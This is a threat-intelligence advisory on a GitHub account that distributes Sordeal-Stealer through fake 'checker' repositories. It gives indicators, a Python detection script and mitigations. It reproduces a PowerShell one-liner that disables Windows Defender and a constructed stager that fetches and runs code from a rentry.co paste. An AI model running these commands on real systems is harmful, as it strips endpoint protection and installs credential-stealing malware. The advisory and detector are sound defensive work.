
Malicious GitHub user and account - distributing malicious code and running Sordeal-Stealer

Severity: Medium
Published: Tue Apr 11 2023 (04/11/2023, 00:00:00 UTC)
Source: CIRCL
Type: osint

Description

Malicious GitHub user and account - distributing malicious code and running Sordeal-Stealer

AI-Powered Analysis

Last updated: 06/19/2025, 14:05:23 UTC

Technical Analysis

This threat involves a GitHub account, 'okkz', that publishes repositories disguised as legitimate OSINT-style utilities ('Tiktok-Username-Checker', 'Steam-ID-Checker', 'Discord-Token-Checker', 'lure-s-tiktok-username-checker-LEAKED') and uses them to distribute malicious code, including the Sordeal-Stealer malware. The capabilities tagged on the event are keylogging (MITRE ATT&CK T1056.001), GUI input capture (T1056.002), browser session hijacking (T1185) and exfiltration over an alternative protocol (T1048): the stealer collects user input, browser session tokens and other credentials and sends them out covertly. The indicators show it fetching additional content at run time from raw pastes on rentry.co (for example https://rentry.co/shitbymyself/raw), so the code visible in a repository is not the whole payload.

The event also records a Windows Defender tampering one-liner: a Set-MpPreference call that turns off real-time monitoring, scanning of downloaded files and attachments (IOAV), script scanning and the network inspection system, sets controlled folder access to Disabled, downgrades network protection to audit-only mode, disables cloud (MAPS) reporting and sets sample submission to NeverSend, followed by a second call repeating the NeverSend setting in its numeric form (2). Two caveats matter for defenders: Set-MpPreference only takes effect from an elevated session, and on hosts with Tamper Protection enabled these changes are rejected, so the command is a strong, low-noise detection opportunity rather than a guaranteed bypass. The '&&' chaining is cmd.exe syntax, which suggests the command is launched from a shell spawned by a script rather than typed into PowerShell (the event records the profile text 'Self-taught python & web developer'); this is an inference from the indicator, not a statement in the event.

Because this is a malware distribution campaign rather than a software vulnerability, there is no patch to apply; defence is preventive and behavioural. The event is rated medium severity: the code can steal credentials and disable endpoint defences, but it only runs if a victim clones and executes one of the repositories. The MISP report carries a perpetual lifetime and a certainty of 50%, i.e. moderate confidence in ongoing activity. The lure is social engineering built around free 'checker' tools hosted on a trusted development platform, which makes this a supply-chain-adjacent threat vector for anyone who runs unvetted open-source utilities.
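As an added example (editor's code, not code from the CIRCL event or from the 'okkz' repositories), the Python triage helper below parses the Defender-disabling command line recorded among the indicators and tells an analyst which protections it would switch off and which rentry.co raw pastes a script references. The same function can be fed Sysmon process-creation or PowerShell script block records, which is how mitigation items 4 and 5 would be operationalised; that log mapping, the 'benign' sample and the 'stager' sample are the editor's assumptions, while IOC_CMDLINE and the paste URL are the event's own indicators.

```python
"""Triage Windows Defender tampering in command lines and script blocks.

Added example, not code from the CIRCL event or the 'okkz' repositories.
It reports which Defender protections a Set-MpPreference call switches off
and extracts rentry.co raw-paste URLs used as a download stage. Intended
inputs (editor's assumption): Sysmon Event ID 1 / Security 4688 command
lines, or PowerShell script block text from Event ID 4104.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Set-MpPreference parameters (canonical names) and the values that weaken
# protection. Numeric forms are the enum values the cmdlet also accepts.
WEAKENING: Dict[str, Set[str]] = {
    "DisableRealtimeMonitoring": {"$true", "1"},
    "DisableIOAVProtection": {"$true", "1"},
    "DisableScriptScanning": {"$true", "1"},
    "DisableIntrusionPreventionSystem": {"$true", "1"},
    "DisableBehaviorMonitoring": {"$true", "1"},
    "EnableControlledFolderAccess": {"disabled", "0"},
    "EnableNetworkProtection": {"disabled", "auditmode", "0", "2"},
    "MAPSReporting": {"disabled", "0"},
    "SubmitSamplesConsent": {"neversend", "2"},
}

# Command line recorded as an indicator in the event (verbatim).
IOC_CMDLINE = (
    "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true "
    "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
    "-DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
    "-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled "
    "-SubmitSamplesConsent NeverSend && powershell Set-MpPreference "
    "-SubmitSamplesConsent 2"
)

# Constructed samples (not from the event): a benign preference change, and
# a stager that pulls a second stage from the paste URL listed in the IOCs.
SAMPLES = {
    "ioc": IOC_CMDLINE,
    "benign": "powershell Set-MpPreference -DisableRealtimeMonitoring $false "
              "-SubmitSamplesConsent SendSafeSamples",
    "stager": "$s = (New-Object Net.WebClient).DownloadString("
              "'https://rentry.co/shitbymyself/raw'); Invoke-Expression $s",
}

PASTE_URL = re.compile(r"https?://rentry\.co/[A-Za-z0-9_-]+/raw\b")
# cmd.exe and PowerShell statement separators; each segment is one command.
SEGMENT_SEP = re.compile(r"\s*(?:&&|\|\||;)\s*")


@dataclass
class Finding:
    weakened: List[str] = field(default_factory=list)  # canonical parameter names
    paste_urls: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.weakened or self.paste_urls)


def _resolve(param: str) -> Optional[str]:
    """Map a '-Parameter' token to its canonical name.

    PowerShell accepts any unambiguous prefix of a parameter name, so
    '-DisableRealtime' must resolve like '-DisableRealtimeMonitoring'.
    Ambiguous prefixes (which PowerShell itself rejects) resolve to None.
    """
    stem = param.lstrip("-").lower()
    hits = [k for k in WEAKENING if stem and k.lower().startswith(stem)]
    return hits[0] if len(hits) == 1 else None


def _weakened_in(segment: str) -> List[str]:
    """Return the protections one Set-MpPreference invocation turns off."""
    tokens = segment.split()
    if not any(t.lower() == "set-mppreference" for t in tokens):
        return []
    found = []
    for i, tok in enumerate(tokens):
        if not tok.startswith("-"):
            continue
        # Both '-Name Value' and '-Name:Value' spellings are valid.
        name_part, _, inline = tok.partition(":")
        name = _resolve(name_part)
        if name is None:
            continue
        value = inline if inline else (tokens[i + 1] if i + 1 < len(tokens) else "")
        if value.strip("'\"").lower() in WEAKENING[name]:
            found.append(name)
    return found


def triage(text: str) -> Finding:
    """Classify one command line or script block."""
    seen = set()
    for segment in SEGMENT_SEP.split(text):
        seen.update(_weakened_in(segment))
    return Finding(weakened=sorted(seen),
                   paste_urls=sorted(set(PASTE_URL.findall(text))))


if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        f = triage(sample)
        print(f"{label:7} suspicious={f.suspicious} weakened={f.weakened} urls={f.paste_urls}")
```

Matching on canonical parameter names rather than on the literal text of the indicator is deliberate: PowerShell's prefix and colon syntaxes give an attacker several spellings of the same command, and a rule keyed to the exact IOC string would miss all of them.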

Potential Impact

For European organizations, this threat puts the confidentiality and integrity of user credentials and session tokens at risk, which can lead to unauthorized access to corporate accounts, internal systems and cloud services. Keylogging and GUI input capture can leak passwords, one-time codes typed for two-factor authentication and personally identifiable information. Stolen browser session cookies and tokens let an attacker impersonate a user without re-authenticating, which also sidesteps MFA for the lifetime of the session. Disabling endpoint security features raises the likelihood of successful infection and persistence.

Organizations whose developers or analysts pull GitHub-hosted open-source or OSINT utilities are most exposed, since a single cloned and executed repository is enough. The consequences are data breaches, account takeover and lateral movement within networks; exfiltration over alternative protocols complicates detection and response. No direct availability impact is noted, but stolen credentials can indirectly disrupt operations through fraud or follow-on ransomware. The medium severity reflects a moderate but tangible threat, especially to sectors with a high reliance on open-source software development such as technology, finance and government entities in Europe.

Mitigation Recommendations

1. Implement strict code provenance policies: only vetted and trusted repositories may be used in development and operational environments.
2. Use automated scanning integrated with CI/CD pipelines to detect and block malicious code or suspicious repositories before anything is deployed or executed.
3. Educate developers and users about the risks of cloning and running unverified GitHub repositories, emphasizing verification of author reputation and repository integrity.
4. Enable Windows Defender Tamper Protection so that Set-MpPreference cannot turn off real-time monitoring, cloud protection or sample submission, and alert on Defender configuration changes (Microsoft-Windows-Windows Defender/Operational Event ID 5007) and on PowerShell script block logs (Event ID 4104) or process command lines that contain Set-MpPreference with Disable* or Disabled arguments. PowerShell execution policy is not a security boundary and should not be relied on for this.
5. Employ endpoint detection and response (EDR) solutions capable of detecting behavioural indicators such as keylogging, GUI input capture and unusual network exfiltration patterns.
6. Regularly audit and monitor user accounts and session tokens for anomalous activity indicative of session hijacking.
7. Restrict outbound protocols through egress filtering, network segmentation and firewall rules, and block or alert on paste services such as rentry.co raw endpoints where there is no business need.
8. Maintain up-to-date threat intelligence feeds to identify and block the malicious URLs and domains associated with this campaign.
9. Enforce multi-factor authentication (MFA) and credential rotation to limit the impact of stolen credentials; because keylogged one-time codes and stolen session cookies can bypass MFA, revoke active sessions as well when compromise is suspected.
10. Conduct regular security awareness training focusing on social engineering and supply chain risks related to open-source software.


Technical Details

Threat Level: 2
Analysis: 2
UUID: 659a6331-0690-4b3b-ae16-e29a1fc31fc2
Original Timestamp: 1681225599 (2023-04-11 15:06:39 UTC)

Indicators of Compromise

Github username

github-username: okkz

Github repository

github-repository: Tiktok-Username-Checker
github-repository: Steam-ID-Checker
github-repository: lure-s-tiktok-username-checker-LEAKED
github-repository: Discord-Token-Checker

File

file: 120434897.jpeg

Text

text: Self-taught python & web developer.
text: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
text: PowerShell
text: Fetched from https://rentry.co/shitbymyself/raw
text: Malicious

Link

link: https://github.com/okkz

Url

url: https://rentry.co/shitonyourAV/raw
url: https://rentry.co/shitbymyself/raw
url: https://rentry.co/9ops5/raw
url: https://rentry.co/khsph/raw

Threat ID: 682c7adbe3e6de8ceb777dd5

Added to database: 5/20/2025, 12:51:39 PM

Last enriched: 6/19/2025, 2:05:23 PM

Last updated: 8/11/2025, 7:57:28 PM

